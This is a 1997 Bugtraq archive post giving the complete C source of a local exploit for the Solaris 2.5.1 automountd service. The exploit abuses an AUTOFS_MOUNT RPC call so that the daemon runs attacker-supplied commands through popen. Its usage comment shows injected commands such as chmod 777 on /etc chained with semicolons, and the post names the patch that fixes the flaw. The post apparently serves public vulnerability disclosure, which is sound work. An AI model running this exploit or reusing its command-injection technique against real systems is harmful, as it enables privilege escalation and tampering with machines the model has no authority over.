Bugtraq mailing list archives
Solaris 2.5.1 automountd exploit (fwd)
From: aleph1 () DFW NET (Aleph One)
Date: Wed, 26 Nov 1997 02:02:13 -0600
From anonymous:
-- /* this is really dumb automountd exploit, tested on solaris 2.5.1 ./r blahblah /bin/chmod "777 /etc; 2nd cmd;3rd cmd" and so on, map is executed via popen with key given as argument, read automount(1M) patch 10465[45] fixes this */ #include <sys/types.h> #include <sys/time.h> #include <stdio.h> #include <netdb.h> #include <rpc/rpc.h> #include <rpcsvc/autofs_prot.h> #define AUTOTS "datagram_v" /* XXX */ void usage(char *s) { printf("Usage: %s mountpoint map key [opts]\n", s); exit(0); } bool_t xdr_mntrequest(xdrs, objp) register XDR *xdrs; mntrequest *objp; { register long *buf; if (!xdr_string(xdrs, &objp->name, A_MAXNAME)) return (FALSE); if (!xdr_string(xdrs, &objp->map, A_MAXNAME)) return (FALSE); if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS)) return (FALSE); if (!xdr_string(xdrs, &objp->path, A_MAXPATH)) return (FALSE); return (TRUE); } bool_t xdr_mntres(xdrs, objp) register XDR *xdrs; mntres *objp; { register long *buf; if (!xdr_int(xdrs, &objp->status)) return (FALSE); return (TRUE); } main(int argc, char *argv[]) { char hostname[MAXHOSTNAMELEN]; CLIENT *cl; enum clnt_stat stat; struct timeval tm; struct mntrequest req; struct mntres result; if (argc < 4) usage(argv[0]); req.path=argv[1]; req.map=argv[2]; req.name=argv[3]; req.opts=argv[4]; if (gethostname(hostname, sizeof(hostname)) == -1) { perror("gethostname"); exit(0); } if ((cl=clnt_create(hostname, AUTOFS_PROG, AUTOFS_VERS, AUTOTS)) == NULL) { clnt_pcreateerror("clnt_create"); exit(0); } tm.tv_sec=5; tm.tv_usec=0; stat=clnt_call(cl, AUTOFS_MOUNT, xdr_mntrequest, (char *)&req, xdr_mntres, (char *)&result, tm); if (stat != RPC_SUCCESS) clnt_perror(cl, "mount call"); else printf("mntres = %d.\n", result.status); clnt_destroy(cl); }
Current thread:
- Solaris 2.5.1 x86 statd exploit Aleph One (Nov 24)
- r00t advisory [ Madden 97, Madden 64 ] [ Nov 25 1997 ] (fwd) X (Nov 24)
- Re: Solaris 2.5.1 x86 statd exploit Casper Dik (Nov 25)
- Cisco LocalDirector password loss: alert cancelled John Bashinski (Nov 25)
- CERT Vendor-Initiated Bulletin VB-97.14 - scoterm Aleph One (Nov 25)
- Solaris 2.5.1 automountd exploit (fwd) Aleph One (Nov 26)
- Potenial DOS in Windows NT RAS PPTP Kevin Wormington (Nov 26)